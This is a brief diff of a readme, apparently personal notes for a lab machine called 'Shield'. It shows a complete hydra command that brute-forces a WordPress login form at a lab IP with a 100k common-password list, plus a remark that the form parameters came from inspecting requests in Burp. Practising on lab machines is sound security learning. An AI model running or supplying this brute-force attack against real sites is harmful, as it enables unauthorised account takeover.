OrkunAvci/Hacking/Shield/readme.md

 hydra -l admin -P ./../SecLists-2021.2/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt 10.10.10.29 http-form-post "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.10.29%2Fwordpress%2Fwp-admin%2F&testcookie=1:ERROR"
 ```

-This was fabricated from the examining the requests through both Dev Tools and Burp.
+This was fabricated from examining the requests through both Dev Tools and Burp.
 I am not %100 sure about the `ERROR` part however.

 ---